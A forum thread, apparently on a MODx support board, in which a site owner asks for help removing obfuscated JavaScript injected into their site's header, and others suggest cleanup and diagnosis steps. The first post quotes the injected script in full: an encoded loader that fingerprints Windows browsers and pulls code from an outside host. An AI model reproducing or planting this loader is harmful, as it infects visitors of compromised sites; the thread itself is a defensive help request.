My site
http://www.aallinlimos.com has had some random JavaScript injected into the header, right after the closing head tag.
It looks like this:
<script language=javascript><!--
(function(Xtnwx){var bHrg='%';var bcrf='var&20&61&3d&22ScriptEngine&22&2cb&3d&22Version()+&22&2cj&3d&22&22&2cu&3dnavigator&2euserAgent&3bif((u&2eindex&4ff&28&22Win&22)&3e0)&26&26(u&2eindexOf(&22NT&206&22)&3c0)&26&26(document&2ecookie&2ein&64exOf(&22miek&3d1&22)&3c0)&26&26(type&6ff(zrvzts)&21&3dtypeof(&22A&22)))&7bzrv&7ats&3d&22A&22&3beval(&22&69f(win&64ow&2e&22+a+&22)j&3dj+&22+a+&22Major&22+b+a+&22Minor&22+b+a+&22Build&22+b+&22j&3b&22)&3bdocument&2ewrite(&22&3cscript&20src&3d&2f&2fgumb&6car&2ecn&2frss&2f&3f&69d&3d&22+j+&22&3e&3c&5c&2fscript&3e&22)&3b&7d';var yirU=bcrf.replace(Xtnwx,bHrg);eval(unescape(yirU))})(/&/g);
--></script>
Can someone please help me remove it? Google has blocked my site.
I found out the information above from here:
http://badwarebusters.org/main/itemview/3616?t=1792#itemblock-3622
I’ve tried upgrading MODx, installed new files over old, but the upgrade option was not highlighted so I couldn’t complete it.
Thanks!
Faithfully using MODx since 2007!
You should start by making sure your server is secure, there is no point in trying this just to have an automatic script inject it again.
The easiest way to fix this is to do a clean install and restore everything from an uninfected backup. If for some reason that’s not an option the first thing to do is identify where the script is coming from, is it in a file(s) or is it in the database? Normally everything MODx displays comes from the database, open the db with phpmyadmin or something similar and take a look. When you have an idea whats actually wrong and needs fixing only then you can do something about it.
Take a look at your index.php file. That’s where hackers most commonly add malicious code. If it contains the js malware, look at the copy of it on your local machine.
I went through the database but found nothing. I used the search method and entered part of the code, but it came back with nothing. I also clicked on each table and went through it using pypmyadmin, but nada.
I’ve already looked at the index.php file and didn’t see anything there either.
I ran an anti virus scan on my Mac but it found nothing.
Anything else I can try?
Faithfully using MODx since 2007!
Could it be in the cache?
I’m looking in the cache now, there are 2 files in here that I havent seen before:
docid_1.pageCache.php
docid_6.pageCache.php
Anyone know if these are suppose to be here?
I also looked at the cookies, and it seems like everytime the page is loaded it sets cookies.. Is this normal for MODx? I’m not logged into the site manager either.
Faithfully using MODx since 2007!
Just compared the existing index.php and a new one, they are exactly the same.
Faithfully using MODx since 2007!
Excuse my ignorance, how is that done? What should I search for, a part of the code?
Faithfully using MODx since 2007!